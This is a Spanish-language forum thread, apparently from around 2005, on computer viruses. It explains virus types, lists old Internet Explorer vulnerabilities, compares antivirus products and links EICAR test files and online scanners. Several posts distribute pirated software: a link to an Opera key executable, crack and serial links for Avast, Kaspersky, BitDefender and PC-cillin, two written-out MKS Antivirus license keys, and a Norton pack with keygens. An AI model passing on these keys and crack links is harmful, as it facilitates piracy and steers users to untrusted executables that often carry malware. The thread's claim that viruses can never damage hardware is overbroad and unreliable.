En esta seccion se aclararan las dudas sobre todos los virus,amenasas recientes,como eliminarlos,etc...
espero que solucionen sus problemas aqui.
http://www.gifanimados.com/lineas/colores/spark.gif
Primero que nada:
¿Que Es un virus?
http://img191.echo.cx/img191/4896/virus5kb.jpg
Virus Informaticos:
Descripcion:
* Son programas de computadora.
* Su principal cualidad es la de poder autorreplicarse.
* Intentan ocultar su presencia hasta el momento de la explosión.
* Producen efectos dañinos en el "huésped".

Si exceptuamos el primer punto, los restantes podrían aplicarse también a alos virus biológicos. El parecido entre biología y tecnología puede llegar a ser en ocasiones ciertamente abrumador. Como el cuerpo humano, el computadora puede ser atacado por agentes infecciosos capaces de alterar su correcto funcionamiento o incluso provocar daños irreparables en ciertas ocasiones. En estas páginas usaré comúnmente términos biológicos. Esto es debido a que pienso que , realmente, los virus informáticos son auténticas imitaciones de sus hermanos biológicos. Así pues usaré palabras como "explosión", "huésped", "peligrosidad tecnológica o tecnopeligrosidad", "zona caliente", etc... para explicar términos completamente informáticos.
Un virus es un agente peligroso que hay que manejar con sumo cuidado. La "contención" es la primera regla de oro. Desarrollemos un poco los puntos expuestos antes:
Un virus informático es un programa de computadora, tal y como podría ser un procesador de textos, una hoja de cálculo o un juego. Obviamente ahí termina todo su parecido con estos típicos programas que casi todo el mundo tiene instalados en sus computadoras. Un virus informático ocupa una cantidad mínima de espacio en disco ( el tamaño es vital para poder pasar desapercibido ), se ejecuta sin conocimiento del usuario y se dedica a autorreplicarse, es decir, hace copias de sí mismo e infecta archivos, tablas de partición o sectores de arranque de los discos duros y disquetes para poder expandirse lo más rápidamente posible. Ya se ha dicho antes que los virus informáticos guardan cierto parecido con los biológicos y es que mientras los segundos infectan células para poder replicarse los primeros usan archivos para la misma función. En ciertos aspectos es una especie de "burla tecnológica" hacia la Naturaleza. Mientras el virus se replica intenta pasar lo más desapercibido que puede, intenta evitar que el "huésped" se dé cuenta de su presencia... hasta que llega el momento de la "explosión". Es el momento culminante que marca el final de la infección y cuando llega suele venir acompañado del formateo del disco duro, borrado de archivos o mensajes de protesta. No obstante el daño se ha estado ejerciendo durante todo el proceso de infección, ya que el virus ha estado ocupando memoria en el computadora, ha ralentizado los procesos y ha "engordado" los archivos que ha infectado.
http://www.gifanimados.com/lineas/colores/spark.gif
Tipos de virus Existentes:

Virus residentes

La característica principal de estos virus es que se ocultan en la memoria RAM de forma permanente o residente. De este modo, pueden controlar e interceptar todas las operaciones llevadas a cabo por el sistema operativo, infectando todos aquellos ficheros y/o programas que sean ejecutados, abiertos, cerrados, renombrados, copiados, etc.

Estos virus sólo atacan cuando se cumplen ciertas condiciones definidas previamente por su creador (por ejemplo, una fecha y hora determinada). Mientras tanto, permanecen ocultos en una zona de la memoria principal, ocupando un espacio de la misma, hasta que son detectados y eliminados.

Algunos ejemplos de este tipo de virus son: Randex, CMJ, Meve, MrKlunky.


Virus de acción directa

Al contrario que los residentes, estos virus no permanecen en memoria. Por tanto, su objetivo prioritario es reproducirse y actuar en el mismo momento de ser ejecutados. Al cumplirse una determinada condición, se activan y buscan los ficheros ubicados dentro de su mismo directorio para contagiarlos.

Además, también realizan sus acciones en los directorios especificados dentro de la línea PATH (camino o ruta de directorios), dentro del fichero AUTOEXEC.BAT (fichero que siempre se encuentra en el directorio raíz del disco duro).

Los virus de acción directa presentan la ventaja de que los ficheros afectados por ellos pueden ser desinfectados y restaurados completamente.


Virus de sobreescritura

Estos virus se caracterizan por destruir la información contenida en los ficheros que infectan. Cuando infectan un fichero, escriben dentro de su contenido, haciendo que queden total o parcialmente inservibles.

También se diferencian porque los ficheros infectados no aumentan de tamaño, a no ser que el virus ocupe más espacio que el propio fichero (esto se debe a que se colocan encima del fichero infectado, en vez de ocultarse dentro del mismo).

La única forma de limpiar un fichero infectado por un virus de sobreescritura es borrarlo, perdiéndose su contenido.

Algunos ejemplos de este tipo de virus son: Way, Trj.Reboot, Trivial.88.D.


Virus de boot o de arranque

Los términos boot o sector de arranque hacen referencia a una sección muy importante de un disco (tanto un disquete como un disco duro respectivamente). En ella se guarda la información esencial sobre las características del disco y se encuentra un programa que permite arrancar el ordenador.

Este tipo de virus no infecta ficheros, sino los discos que los contienen. Actúan infectando en primer lugar el sector de arranque de los disquetes. Cuando un ordenador se pone en marcha con un disquete infectado, el virus de boot infectará a su vez el disco duro.

Los virus de boot no pueden afectar al ordenador mientras no se intente poner en marcha a éste último con un disco infectado. Por tanto, el mejor modo de defenderse contra ellos es proteger los disquetes contra escritura y no arrancar nunca el ordenador con un disquete desconocido en la disquetera.

Algunos ejemplos de este tipo de virus son: Polyboot.B, AntiEXE.


Virus de macro

El objetivo de estos virus es la infección de los ficheros creados usando determinadas aplicaciones que contengan macros: documentos de Word (ficheros con extensión DOC), hojas de cálculo de Excel (ficheros con extensión XLS), bases de datos de Access (ficheros con extensión MDB), presentaciones de PowerPoint (ficheros con extensión PPS), ficheros de Corel Draw, etc.

Las macros son micro-programas asociados a un fichero, que sirven para automatizar complejos conjuntos de operaciones. Al ser programas, las macros pueden ser infectadas.

Cuando se abre un fichero que contenga un virus de este tipo, las macros se cargarán de forma automática, produciéndose la infección. La mayoría de las aplicaciones que utilizan macros cuentan con una protección antivirus y de seguridad específica, pero muchos virus de macro sortean fácilmente dicha protección.

Existe un tipo diferente de virus de macro según la herramienta usada: de Word, de Excel, de Access, de PowerPoint, multiprograma o de archivos RTF. Sin embargo, no todos los programas o herramientas con macros pueden ser afectadas por estos virus.

Estos son algunos ejemplos: Relax, Melissa.A, Bablas, O97M/Y2K.


irus de enlace o directorio

Los ficheros se ubican en determinadas direcciones (compuestas básicamente por unidad de disco y directorio), que el sistema operativo conoce para poder localizarlos y trabajar con ellos.

Los virus de enlace o directorio alteran las direcciones que indican donde se almacenan los ficheros. De este modo, al intentar ejecutar un programa (fichero con extensión EXE o COM) infectado por un virus de enlace, lo que se hace en realidad es ejecutar el virus, ya que éste habrá modificado la dirección donde se encontraba originalmente el programa, colocándose en su lugar.

Una vez producida la infección, resulta imposible localizar y trabajar con los ficheros originales.


Virus encriptados

Más que un tipo de virus, se trata de una técnica utilizada por algunos de ellos, que a su vez pueden pertenecer a otras clasificaciones.

Estos virus se cifran o encriptan a sí mismos para no ser detectados por los programas antivirus. Para realizar sus actividades, el virus se descifra a sí mismo y, cuando ha finalizado, se vuelve a cifrar.

Estos son algunos ejemplos de este tipo de virus: Elvira, Trile.


Virus polimórficos

Son virus que en cada infección que realizan se cifran o encriptan de una forma distinta (utilizando diferentes algoritmos y claves de cifrado).

De esta forma, generan una elevada cantidad de copias de sí mismos e impiden que los antivirus los localicen a través de la búsqueda de cadenas o firmas, por lo que suelen ser los virus más costosos de detectar.

Algunos ejemplos de este tipo de virus son: Elkern, Marburg, Satan Bug, Tuareg.


Virus multipartite

Virus muy avanzados, que pueden realizar múltiples infecciones, combinando diferentes técnicas para ello. Su objetivo es cualquier elemento que pueda ser infectado: archivos, programas, macros, discos, etc.

Se consideran muy peligrosos por su capacidad de combinar muchas técnicas de infección y por los dañinos efectos de sus acciones.

Algunos ejemplos de estos virus son: Ywinz.


Virus de Fichero

Infectan programas o ficheros ejecutables (ficheros con extensiones EXE y COM). Al ejecutarse el programa infectado, el virus se activa, produciendo diferentes efectos.

La mayoría de los virus existentes son de este tipo.


Virus de compañía

Son virus de fichero que al mismo tiempo pueden ser residentes o de acción directa. Su nombre deriva de que "acompañan" a otros ficheros existentes en el sistema antes de su llegada, sin modificarlos como hacen los virus de sobreescritura o los residentes.

Para efectuar las infecciones, los virus de compañía pueden esperar ocultos en la memoria hasta que se lleve a cabo la ejecución de algún programa, o actuar directamente haciendo copias de sí mismos.

Algunos ejemplos de este tipo de virus son: Stator, Asimov.1539, Terrax.1069.


Virus de FAT

La Tabla de Asignación de Ficheros o FAT es la sección de un disco utilizada para enlazar la información contenida en éste. Se trata de un elemento fundamental en el sistema.

Los virus que atacan a este elemento son especialmente peligrosos, ya que impedirán el acceso a ciertas partes del disco, donde se almacenan los ficheros críticos para el normal funcionamiento del ordenador. Los daños causados a la FAT se traducirán en pérdidas de la información contenida en ficheros individuales y en directorios completos.


Gusanos (Worms)

De un modo estricto, los gusanos no se consideran virus porque no necesitan infectar otros ficheros para reproducirse. A efectos prácticos, son tratados como virus y son detectados y eliminados por los antivirus.

Básicamente, los gusanos se limitan a realizar copias de sí mismos a la máxima velocidad posible, sin tocar ni dañar ningún otro fichero. Sin embargo, se reproducen a tal velocidad que pueden colapsar por saturación las redes en las que se infiltran.

Las infecciones producidas por estos virus casi siempre se realizan a través del correo electrónico, las redes informáticas y los canales de Chat (tipo IRC o ICQ) de Internet. También pueden propagrase dentro de la memoria del ordenador.

Estos son algunos ejemplos de gusanos: PSWBugbear.B, Lovgate.F, Trile.C, Sobig.D, Mapson.


Troyanos o caballos de Troya

Técnicamente, los Troyanos tampoco se consideran virus, ya que no se reproducen infectando otros ficheros. Tampoco se propagan haciendo copias de sí mismo como hacen los gusanos. A efectos prácticos, son tratados como virus y son detectados y eliminados por los antivirus.

El objetivo básico de estos virus es la introducción e instalación de otros programas en el ordenador, para permitir su control remoto desde otros equipos.

Su nombre deriva del parecido en su forma de actuar con los astutos griegos de la mitología: llegan al ordenador como un programa aparentemente inofensivo. Sin embargo, al ejecutarlo instalará en nuestro ordenador un segundo programa, el troyano.

Los efectos de los Troyanos pueden ser muy peligrosos. Al igual que los virus, tienen la capacidad de eliminar ficheros o destruir la información del disco duro. Pero además pueden capturar y reenviar datos confidenciales a una dirección externa o abrir puertos de comunicaciones, permitiendo que un posible intruso controle nuestro ordenador de forma remota.

Estos son algunos ejemplos de Troyanos: IRC.Sx2, Trifor.


Bombas lógicas

Tampoco se consideran estrictamente virus, ya que no se reproducen. Ni siquiera son programas independientes, sino un segmento camuflado dentro de otro programa.

Tienen por objetivo destruir los datos de un ordenador o causar otros daños de consideración en él cuando se cumplen ciertas condiciones. Mientras este hecho no ocurre, nadie se percata de la presencia de la bomba lógica. Su acción puede llegar a ser tremendamente destructiva.


Virus falsos

Al margen de las divisiones anteriores, existen ciertos tipos de mensajes o programas que en ciertos casos son confundidos con virus, pero que no son virus en ningún sentido.

El principal componente de este grupo son los hoaxes o bulos. Los hoaxes no son virus, sino mensajes de correo electrónico engañosos, que se difunden masivamente por Internet sembrando la alarma sobre supuestas infecciones víricas y amenazas contra los usuarios.

Los hoaxes tratan de ganarse la confianza de los usuarios aportando datos que parecen ciertos y proponiendo una serie de acciones a realizar para librarse de la supuesta infección.

Si se recibe un hoax, no hay que hacer caso de sus advertencias e instrucciones: lo más aconsejable es borrarlo sin prestarle la más mínima atención y no reenviarlo a otras personas.
http://www.gifanimados.com/lineas/colores/spark.gif
¿Pero quiene crean estos virus?

Los creadores de virus son los denominados hackers o crackers. La mayoría buscan la notoriedad y el reconocimiento social.

Tienen como objetivo poner al descubierto agujeros de seguridad o vulnerabilidades encontrados en conocidas herramientas informáticas. También les impulsa el hecho de superarse a sí mismos desarrollando nuevas tecnologías, nuevas técnicas de ingeniería social para engañar al usuario, etc.

http://www.gifanimados.com/lineas/colores/spark.gif
Atencion:

¿Qué efectos pueden producir los virus?

Los efectos que pueden producir los virus son muy variables. Van desde la destrucción total de la información del ordenador a la ejecución de pequeñas "bromas" informáticas sin ningún tipo de daño.

¿Qué efectos no pueden producir los virus?

Contrariamente a lo que mucha gente pueda creer, los virus nunca pueden llegar a dañar el hardware (CD Rom, disquetera, etc.). Tampoco afectarán nunca a información protegida contra escritura (por ejemplo, en Cds de sólo lectura) ni a elementos que se encuentren cerca del ordenador, como las tarjetas de crédito.

para vos, me conviene quedarme con el avg 7.0 (es actualmente mi antivirus) o me cambio al Kaspersky?

Vulnerabilidades que afectan a Internet Explorer.
Cross-site scripting. Afecta a Internet Explorer (versiones 5.01, 5.5 y 6.0), siendo aprovechada para ejecutar código maligno en un ordenador a través de una página Web en Internet, o a través de un mensaje de correo electrónico en formato HTML.

Información adicional: boletín de seguridad de Microsoft MS02-023.

Solución: disponible en la Web de Microsoft, en la página Knowledge Base article Q321323 y en la página de Windows Update.
XMLHTTP Control Can Allow Access to Local Files. Esta vulnerabilidad permite enviar o recibir datos XML mediante el protocolo HTTP. El problema corresponde al modo como el control XMLHTTP aplica la configuración de Internet Explorer. El resultado es que se puede obtener información del sistema afectado.

Información adicional: boletín de seguridad de Microsoft MS02-008.

Solución: disponible en la Web de Microsoft, en la página Knowledge Base article Q317244.
Incorrect VBScript Handling in IE can Allow Web Pages to Read Local Files. Esta vulnerabilidad permite que un atacante acceda a las macros existentes en otros dominios, mediante páginas Web o mensajes de correo electrónico en formato HTML. Esto se debe a que Internet Explorer no valida correctamente la relación el dominio cuando utiliza código escrito en el lenguaje de programación Visual Basic Script, lo que hace posible que el atacante obtenga datos confidenciales, recogidos desde páginas HTML.

Información adicional: boletín de seguridad de Microsoft MS02-009.

Solución: disponible en la Web de Microsoft, en la página Knowledge Base article Q318089.
Malformed Dotless IP Address Can Cause Web Page to be Handled in Intranet Zone. Permite que se puedan abrir páginas Web en Internet con un bajo nivel de seguridad y también permite que el atacante redireccione al ordenador atacado a una determinada página Web. En tercer lugar, esta vulnerabilidad permite que se puedan ejecutar sesiones remotas de Telnet a través de Internet Explorer.

Información adicional y solución: boletín de seguridad de Microsoft MS01-051.
Incorrect MIME Header Can Cause IE to Execute E-mail. Esta vulnerabilidad impide que Internet Explorer interprete correctamente el código HTML.

http://www.gifanimados.com/lineas/colores/spark.gif

Por Eso es que les Reconmiendo opera.
Ningun firewall es perfecto y ningun Navegador tampoco pero entre opera e Ie..les recomiendo opera.
Aca esta la publicacion de Opera + Serial.
http://www.gifanimados.com/lineas/colores/spark.gif

Opera 7.54 Navegador en español.
Este es el opera que es trial pero al registrarlo le quita la molestosa publicidad.
Datos:

• Tamaño: 3,5 MB
• S.O.: Win95/98/98SE/NT/ME/2000/XP
Descripcion:
Opera es un navegador alternativo al estándar Internet Explorer, que tiene numerosas características y funcionalidades.

Opera cuenta con una optimizada interfaz de usuario, al igual que también optimiza la gestión de recursos.

Opera permite navegar sin publicidad con su filtro anti pop-ups, pudiendo configurarse cuales queremos bloquear, y sobre todo que lleva incluida la navegación con pestañas, pudiendo abrir varias páginas web dentro de la misma ventana.
Ademas de las muchas opciones que trae....

Gracias a estas características y muchas más, Opera está siendo uno de los navegadores del momento.

Descargar de:

http://img59.exs.cx/img59/2038/pillblue2vl.gif+http://img142.exs.cx/img142/3377/software9fe.gif
http://rapidshare.de/files/1079139/Opera_Key.exe.html
:arrow: Forma de registrar:Presionar en ayuda y registrar opera.
Espero que les guste este navegador es muy bueno....

Opinion:
Opera 7.54
Holas segun yo es uno de los mejores navegadores ya que tiene muchos puertos cerrados y es mas seguro, nos e le instalan barras especiales, tiene bloqueo opcional de pop-ups, tiene etiquetas y no habre mas en la parte de abajo del Windows:
http://img65.exs.cx/img65/1521/opera1iz.gif
(lo que e smuy bueno) .
Al registrarlo se quita la publicidad chica que trae arriba nada mas ;)
http://img142.exs.cx/img142/3377/software9fe.gif+http://img59.exs.cx/img59/2038/pillblue2vl.gif

Yo te recomiendo El KaV por que tiene mejor busqueda y no deja pasar nada por alto,ademas de que esta muy bien calificado.
El AVG es muy bueno tambien uno de los mejores, lo tuve un tiempo y me funciono muy bien.
Dependiendo de Tu pc como sea en velocidad,etc..
El Kav ocupa muchos recursos pero es el mejor
el AVG no me acurdo como es pero me cuentas :wink:
Si tu pc es rapido prueba el KAV.
Te lo recomiendo
Chau Saludos

*****Esperando que Sweet Aga el Post de Zona Spywares****

OK, MI PC SE PODRIA DECIR QUE ES RAPIDA, TENDRE EN CUENTA TU MENSAJE Y ESPERARE OTROS MAS, ME VOY A DECIDIR
GRACIASSSSSS
CHAU

Este fuè mi pequeña y casera comparaciòn entre dos soft antivirus que hice para el post ZONA DE SEGURIDAD espero sirva para aclarar algo, aunque es todo materia de discusiòn...

Amigos yeguo y Rasen, y tambièn como infop a todos ......

Instale el Bitdefender 8 con serial, para no comprometer al sist. de seguridad,.
Paso a comentarles

Para ver la utilizaciòn de recursos, use el EVEREST 1.51 por el cuàl me da numeros y comparaciòn (benchmark) fuè maravilloso comprobar que he aumentado la capacidad de memoria ram libre, llevando los nùmeros a puestos que nunca habìa estado..
En el Benchmark de
1-lectura de memoria , ha subido un puesto.
2-En escritura de memoria dos puestos y
3- mejorò el rendimiento en latencia, no la latencia sino el rendimiento, de 49.5 bajò a 48.3, siempre respetando el cas 2-2-2-5 de las memos

En ppio los de Rasen, fuè un buen consejo, el comportamiento del Bitdefender versiòn 8 es superior al Pc-Cillin 2005 en rendimiento y utlizaciòn de recursos, ademàs posee un Firewall muiy activo...el cual vy a probar................., con los link de prueba que aportò Rasen

Y pensar que no tenìa en cta. a este antivirus !!!!!


Por Ultimo el archivo instalado del Bitdefender pesa 20MB, contra los 94 MB que pesaba el Pc-Cillin 2005, ha tener en cuenta que ya tengo actualizado el Bitd.....

Es mucha la diferencia a favor del BITDEFENDER Versiòn 8

Me faltan algunas pruebas , pero todo indica que es un muy buen antivirus y que no consume recursos

Saludos Sweet


Info agregada de las pruebas de detecciòn,pòr simulaciòn de VIRUS


Por ùltimo he probado al Bitdefender versiòn 8, con las paginas para simulaciòn de ingreso de virus que nos aportò el amigo Rasen

Paso a describirles

Cuando el Pc-Cillin 2005, solamente encontrò problemas en la primera de las cuatro pruebas (fallo en la otras tres y estando actualizado)

El Bitdefender , NO FALLO EN NINGUNA DE LAS CUATRO , detectò el virus en las cuatro, esto significa que el PC-Cillin 2005 tuvo un rendimiento del 25% en la detecciòn .
El Bitdefender, tuvo un rendimiento del 100%,.

Concluyo que es muy superior , com,parado con el Pc-Cillin utilizado .
Bueno espero les halla gustado la pequeña reseña y sirva para hacer otras comparaciones (que aunque sean caseras aportan algo)

Hasta otro momento

Saludos a todos mis amigos

:D Sweet

Bueno Aca esta Uno de los posts de Nuestro buen amigoRaSen
Y aca esta el Post:

ATENCION!!!

para probar la eficacia de sus antivirus, colocare unos links que simulan ser virus... para evr que tal tu antivirus reacciona ante este tipo de cofigos... (NO SON VIRUS, SINO SIMULACIONES) nada pierden nada con probar:

http://www.eicar.org/download/eicar.com (FORMAT .COM)
http://www.eicar.org/download/eicar.com.txt (TXT FORMAT)
http://www.eicar.org/download/eicar_com.zip (COM.ZIP FORMAT)
http://www.eicar.org/download/eicarcom2.zip (ZIP FORMAT)

son muy buenos test, si tu antivirus no detecta estas alertas, es hora de cambiarte de antivirus!!![/quote]

PD:¡ADVERTENCIA!. Existen algunos virus reales que simulan ser el EICAR (ver Referencias). Por su seguridad, solo utilice y acepte los archivos que en el post anterior o test de prueba.
Referencias:

EIC.Trojan. Simula ser el EICAR pero es destructivo
http://www.vsantivirus.com/eic-trojan.htm

Bat/Bwg.A. Puede ser confundido con el EICAR test file
http://www.vsantivirus.com/bwg-a.htm

Chau Saludos

Habra ke ir moviendo algunos posts...

Bueno he estado buscando por ahí, y para ke no esteis buscando loas antivirus ni nada, os pongo aki todo esto ke lo he pillado de otro foro, para todos vosotros :)

Avast Professional Edition v4.6.603 en español
soft
http://download3.avast.com/iavs4pro/setupesppro.exe
crack
http://force.andr.net/andr-crack/a/ac-aav4a.zip

http://img205.exs.cx/img205/8982/avastprofessionaledition9au.jpg


AVG Professional 7.0

http://www.grisoft.cz/softw/70/filedir/inst/avg70t_308a466.exe

http://img205.exs.cx/img205/111/avgantivirussystem5to.jpg


DR.WEB.V4.32.2.WINDOWS.SUITE

http://files.9down.com/DR.WEB.V4.32.2.WINDOWS.SUITE-Lz0__EN.rar

http://img199.exs.cx/img199/1793/drweb0pt.jpg


eTrust™ EZ Antivirus™ 2005:
FREE Trialware 30-Day License

https://store.ca.com/dr/v2/ec_MAIN.Entry17c?CID=0&SID=56678&SP=10007&PN=21&PID=1321012

http://img208.exs.cx/img208/8270/etrustezantivirus20055vt.jpg


F-ProT Antivirus

http://www.f-prot.com/download/trial_forms/win-home.html

http://img205.exs.cx/img205/9756/fprot5qz.jpg


F-Secure Antivirus 5.40

http://www.f-secure.com/download-purchase/anti-virus/download/fsav540tbyb_w.exe

http://img205.exs.cx/img205/3811/fsecure9kj.jpg

Kaspersky Antivirus Personal Pro 5.0.20 + crack
soft+crack
http://down.crsky.net/kavpro-v5.0.20.rar

http://img205.exs.cx/img205/5167/kasperskyantiviruspersonal9rh.jpg

Mcafee Viruscan v9.0.10

http://www.portalpirata.com/Descargas/Antivirus/Mcafee-Viruscan-v9.0.10-Home-dd1822.html (tambien un simple registro y download!)

http://img205.exs.cx/img205/2659/mcafeeviruscanv93is.jpg


MKS Antivirus
soft
http://files.mks.com.pl/download/windows/mkssetup.exe
serial
HNRL-UXH9-UWI9-7HA3-CGSA or 2J83-KF1P-CL4G-3NIC-XVNK

http://img205.exs.cx/img205/774/mksantivirus0mf.jpg


NOD32 para Windows 95/98/ME versión 2.12.3 (evaluación)

http://u4.eset.com/eval/win/v2/ne98spst.exe

NOD32 para Windows NT/2000/XP/2003 versión 2.12.3 (evaluación)

http://u4.eset.com/eval/win/v2/nentspst.exe

http://img199.exs.cx/img199/6790/nod324qz.jpg


Norton SystemWorks 2005 y Norton Intenet Security 2005, esta recopilación será de gran ayuda para protegerse contra virus y ataques de internet, se incluye en SystemWorks, además de muchas otras utilidades, el Norton Antivirus 2005, y Norton Intenet Security es el firewall de esta famosa marca. El pack viene con un menu de autoarranque desde el que podras instalar los programas, acceder a los KeyGen's y leer una pequeña guía de como instalar y activar los programas. Por último añadir que viene preparado en una imagen ISO, listo para "quemar" en un CD.

http://www.zonadivx.com/Programas-bittorrent-0-letrap.html

http://img205.exs.cx/img205/736/norton20053fb.jpg


Panda Titanium Antivirus 2005 4.0

En este link directamente seleccionas de donde te lo kieres descargar y listo.
http://download.tucows.com/images/reg_head_win.gif

http://download.tucows.com/perl/window95.html?dltarget=download&Target=/adnload/385208_143215.html

http://img205.exs.cx/img205/3602/pandatitanium7no.jpg


Sophos AntiVirus 3.91
http://downloads.sophos.com/dp/full/angz.exe
update
http://www.sophos.com/downloads/ide/391_ides.zip

http://img208.exs.cx/img208/8462/sophos9fr.jpg


Norman Virus Control

http://www.norman.com/trialversions.shtml/no

http://img205.exs.cx/img205/1379/normanviruscontrol6kd.jpg


BitDefender Pro Edition 8.0.138
soft
http://www.bitdefender.com/bd/downl...nder_std_v8.exe
crack
http://www.freeserials.com/serials/...?id=6746&char=B

http://img205.exs.cx/img205/1880/bitdefenderproedition5hx.jpg


PC Cillin Internet Security 2005 12.44
soft
http://www.trendmicro.com/ftp/produ.../pcc25f1244.exe
crack
http://www.freeserials.com/serials/...id=11783&char=P

http://img205.exs.cx/img205/9076/pccillininternetsecurity4yu.jpg


ESPERO KE OS SIRVA DE AYUDA UN SALUDO A TODOS :)

Mucho Antivirus, Pero Faltaban los On-line no? ;) aki estan

· Bitdefender >> busca virus

http://www.bitdefender-es.com/scan/licence.html

· Panda Software >> busca virus

http://www.pandasoftware.es/activescan/es/activescan_principal.htm

· Command on demand >> busca virus

http://www.commandondemand.com/eval/index.cfm

· Symantec >> busca virus

http://security.symantec.com/sscv6/default.asp

· Symantec >> busca agujeros de seguridad

http://security.symantec.com/sscv6/default.asp

· RAV Antivirus >> busca virus

http://www.ravantivirus.com/scan/

· Trend Micro >> busca virus

http://es.trendmicro-europe.com/enterprise/products/housecall.php

· Computer Associates >> busca virus

http://www3.ca.com/securityadvisor/virusinfo/scan.aspx

· McAfee >> busca virus

http://es.mcafee.com/root/mfs/default.asp

· Black Code >> analiza puertos

http://www.blackcode.com/scan/

Asesorías Informáticas y Servicios Afines19/04/2005 Empresa



BitDefender, protagonista en todas partes

Santiago, 09.03.2005




BitDefender presentará en CeBIT (Hannover) nuevas tecnologías para disminuir el tiempo de reacción. Aunque los detalles se siguen manteniendo en secreto, ya se han divulgado algunos datos sobre las nuevas invenciones. Tienen que ver con las dos áreas principales de actualización y detección, y parecen haberse creado para cambiar la manera de concebir la protección antivirus.

Bogdan Dumitru, BitDefender CTO, ha declarado: "El campo del análisis heurístico acaba de dar un paso adelante. Los clientes de BitDefender pueden contar con la detección automática del 60% de virus nuevos, sin necesidad de actualizar las firmas de virus. La tecnología se lanzará progresivamente en un periodo de varios meses, pero debemos empezar a ver los resultados inmediatamente después del lanzamiento. Por ahora no puedo comentar nada más, pero estaremos listos para hacer un comunicado oficial en la feria CeBIT en Hannover. "

Las actualizaciones de las firmas de virus han sido siempre criticadas por los medios de comunicación y por los críticos en la industria de software, porque se ven como "seguridad reactiva" en vez de "proactiva". Si la nueva tecnología tiene éxito, podremos decir ¡adiós! a los días de la "competición de las actualizaciones" entre las compañías del antivirus, que ha establecido firmemente (e irónicamente) a BitDefender en la posición principal.

ACTUALIZACIÓN:

Está programada una conferencia de prensa el 12 de Marzo en Hall 12 del centro de convenciones de CeBIT Hannover, en la cual otros detalles sobre la nueva tecnología HIVE serán revelados a los medios de comeunicación. Bogdan Dumitru, BitDefender CTO, estará dispuesto a responder las preguntas. El discurso principal será presentado por el propietario y CEO de la compañía, Sr. Florian Talpes. Su excelencia, el ministro rumano de comunicaciones y tecnología, Sr. Nagy Zsolt, está previsto que también asista al evento.

Hols bueno si ya tienes un virus que tu antivirus no puede eliminar en esta pagian encontraras los remocedores de Virus:
Estos programas remueven exclusivamente esos virus :D
http://www.virusportal.com/es/descargas/utilidades/
Se utiliza Panda QUICK REMOVER
Chau

Bueno les quiero comentar que me cambien de antivirus al KASPERSKY.
Ekl cual es uno de los mejores...y la verdad es que no merelentiso el pc..yo pense que me hiva a quedar la caga pero quedo bueno:
Miren este es mi pc por si alguien se pregunta si lo podra usar en el suyo:
http://img256.echo.cx/img256/4655/pc1vu.png

ESpero que les sirva esta info por si pensaban que su computador no se lo podia..el mio se lo pudo y va re bien...
Chau Saludos

espero me dejes ayudarte un poco, con un link que encontre en la web y cuenta muchas cosas a tener en cuenta sobre virus, por ejemplo, como se reproducen, como identificarlos, etc...

ahi va :arrow: http://www.monografias.com/trabajos5/virusinf/virusinf.shtml

Una falsa actualización de Windows es un virus troyano

Un engañoso correo electrónico que alerta sobre una actualización del sistema operativo Windows de Microsoft fue diseñado por hackers y dirige a los usuarios hacia un falso sitio web donde está instalado el virus conocido como troyano, anunciaron expertos en materia de seguridad, informó AFP.

Domingo, 10 abril 2005
IBLNEWS, AGENCIAS

La firma de seguridad Websense indicó que esta semana comenzó a recibir informes sobre el correo electrónico que afirma provenir de Microsoft, coincidiendo con el anuncio del gigante informático de que está realizando actualizaciones de sus programas de seguridad.

"El correo electrónico confunde a los usuarios y los lleva a pensar que deben actualizar su software de Windows", indicó Websense.

"Al hacer click en el enlace, los usuarios son derivados a este sitio web falso. Este sitio fue creado en Australia y estaba activo cuando llegaron estas alarmas. Es muy parecido al sitio verdadero de actualización de Windows", agregó.

Pero cuando los usuarios intentan efectivizar la actualización, el virus conocido como troyano se instala, lo que permite a los hackers ingresar a las computadoras infectadas, indicó la compañía.

La firma de seguridad británica Sophos también divulgó un aviso de alerta sobre el mismo asunto.

"La campaña criminal explota la creciente paranoia pública sobre seguridad en sus computadoras con sistema Windows. Si los usuarios caen en la trampa pueden correr el riesgo de ser espiados o de que sus tarjetas de crédito y detalles de cuentas bancarias sean robadas", dijo Grajam Cluley, un importante consultor de tecnología de Sophos.

"Desde hace tiempo venimos recomendando a los usuarios de las computadoras que actualicen sus parches de seguridad, ya que las vulnerabilidades de Microsoft son frecuentemente explotadas por los virus, gusanos y hackers. Pero los usuarios deben ser muy cuidadosos y asegurarse que actualizarán en las páginas oficiales, en lugar de seguir los enlaces de correos electrónicos enviados por hackers".

Para aquellos que no dispongan de uns sistema muy poderoso pero quieran la mejor protección les recomiendo usar dos antivirus en particular:

KAV (úsalo sólo para escanear)
NOD32 (éste ténganlo residente)

Con los dos antivirus configurados de esa forma el sistema no se te va a ralentizar porque el NOD32 casi no usa recursos y te asegurarás de no tener virus debido a la gran eficacia del KAV.

Holas carlosdark54
Encuentro muy bueno tu combo pero enves de Nod32 yo pondria f-prot ya que es mucho mas liviano y tiene l aposibilidad de habilitar la proteccion en tiempo real o descativarla sin tener que poner el Antivirus completo a andar..ademas de que es mas rapido y ocupa muchos menos recursos

:wink:

chaus saludos

PD:Gracias KoNsTrAk por postear tanto pero la erdad es uq eh estado con muchas tareas y npo puedo postear solo eh respondido encuestas casi

[/b]

Holas carlosdark54
Encuentro muy bueno tu combo pero enves de Nod32 yo pondria f-prot ya que es mucho mas liviano y tiene l aposibilidad de habilitar la proteccion en tiempo real o descativarla sin tener que poner el Antivirus completo a andar..ademas de que es mas rapido y ocupa muchos menos recursos

:wink:

chaus saludos

PD:Gracias KoNsTrAk por postear tanto pero la erdad es uq eh estado con muchas tareas y npo puedo postear solo eh respondido encuestas casi

[/b]


jajaja, estamos en las mismas, todo el DIA ESTUDIANDO!!! y tambien haciendo tareas como LOCO!!!

cuidence y nos vemos luego!!!

Bueno Aca les traigo los ANtivirus (todos) Que se adaptana todo tipo de PC`s desde los mas livianos y buenos hasta los mas pesados y Exlentes :wink:
.....Aca comienzan
>>>>>>>>>>>>>>>>>>>>>>><<<<<<<<<<<<<<<<<<<<<<<<
Kaspersky Antivirus Personal Pro 5.0
Datos:
• Tamaño: 28,5 MB
• S.O.: Win98/98SE/ME/2000/XP
•http://www.softonic.com/img/iconos/icon_licencia2.gif

Descripcion:
Kaspersky es un completo y avanzado sistema de protección para usuarios profesionales que requieren una protección extra de fiabilidad garantizada.
